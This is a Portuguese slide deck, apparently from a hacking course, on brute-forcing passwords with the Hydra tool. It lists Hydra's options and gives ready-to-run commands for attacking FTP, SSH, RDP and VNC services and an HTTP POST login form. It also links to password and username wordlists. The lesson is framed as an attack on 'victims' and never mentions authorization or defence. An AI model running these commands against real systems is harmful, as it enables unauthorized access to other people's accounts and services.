Baixe o app para aproveitar ainda mais
Prévia do material em texto
O que temos pra hoje? Temas de Hoje: •Brute Force • Conhecendo Hydra • Modos de Uso • Atacando Serviços Padrão • Atacando HTTP Post Form • Brinde! Wordlists grátis Técnicas de Invasão – Brute Force Brute force com Hydra Técnicas de Invasão – Brute Force Hydra: Entendendo a ferramenta O Hydra descobre senha através de brute-force (tentativa e erro), ele busca em wordlists, possíveis usuários/senhas e vai testando as combinações, uma a uma. O Hydra tem suporte aos serviços Telnet, Formulário HTTP/HTTPS, SSH, MySQL, PostgreSQL, MSSQL, SMB, LDAP2 e LDAP3, FTP, SNMP, CVS,VNC, entre outros. A ferramenta já vem toda instalada e configurada (inclusive com interface gráfica) no BackTrack, porém, caso não tenha instalado, basta fazer o download do código- fonte e compilá-la em qualquer distribuição. Técnicas de Invasão – Brute Force Hydra: Entendendo a ferramenta Opções da ferramenta: -l = Nome/login da vítima; -L = Carrega uma lista contendo nomes/logins de vítimas (1 por linha); -p = Especifica senha única; -P = Carrega uma lista com senhas (1 por linha); -e = Adiciona 'n', testa senha em branco ou adicional 's' testa user como pass; -C = Usado para carregar um arquivo contendo usuário:senha. Formato usuário:senha equivale a - L/-P; -M = Carrega lista de servidores alvos (1 por linha); -o = Salva as senhas encontradas dentro do arquivo que você especificar; -f = Faz o programa parar de trabalhar quando a senha ou usuário for encontrada[o]; -t = Limita o numero de solicitações por vez (default: 16); -w = Define o tempo máximo em segundos para esperar resposta do servidor (default: 30s); -v / -V = Modo verbose do programa. 'V' mostra todas tentativas. Técnicas de Invasão – Brute Force Hydra: Modo de Uso Exemplos de uso: Atacando serviços de FTP: # hydra -L wordlist -P wordlist -v 192.168.2.100 ftp Atacando serviços SSH: # hydra -L wordlist -P wordlist -v 192.168.2.100 ssh Atacando serviços RDP: # hydra -L wordlist -P wordlist -v 192.168.2.100 rdp Atacando serviços VNC: # hydra -L wordlist -P wordlist -v 192.168.2.100 vnc Atacando websites com usuário e senha: # hydra -l teste -P wordlist 192.168.1.105 http-post-form "/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos" Técnicas de Invasão – Brute Force Hydra: Modo de Uso Exemplos de uso: Atacando serviços de FTP: # hydra -L wordlist -P wordlist -v 192.168.2.100 ftp -vV Atacando serviços SSH: # hydra -L wordlist -P wordlist -v 192.168.2.100 ssh Atacando websites com usuário e senha: # hydra -l teste -P wordlist 192.168.1.105 http-post-form "/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos" Técnicas de Invasão – Brute Force Brinde: Wordlists Seguem wordlists em Português e Inglês: Dicionário da Lingua Portuguesa retirada do BROffice: # http://www.esecurity.com.br/blackhat2/wordlists/dicionario.txt Dicinário: Nomes masculinos e femininos (ENG): # http://www.esecurity.com.br/blackhat2/wordlists/female-names.txt # http://www.esecurity.com.br/blackhat2/wordlists/male-names.txt # http://www.esecurity.com.br/blackhat2/wordlists/other-names.txt Dicionário com senhas comuns: # http://www.esecurity.com.br/blackhat2/wordlists/senhas-comuns.txt Dicionário com palavras em Português + de 120.000 palavras: # http://www.esecurity.com.br/blackhat2/wordlists/wordlist-ptbr.txt # http://www.esecurity.com.br/blackhat2/wordlists/wordlist70k.txt Dicionário baseada nas contas mais comuns criadas no Linux: # http://www.esecurity.com.br/blackhat2/wordlists/etc-hosts.txt Técnicas de Invasão – Brute Force E-mail: alan.sanches@esecurity.com.br Twitter: @esecuritybr e @desafiohacker Skype: desafiohacker Fanpage: www.facebook.com/academiahacker printf ("\Chega por hoje\n"); www.eSecurity.com.br Técnicas de Invasão – Ataques à redes Wifi
Compartilhar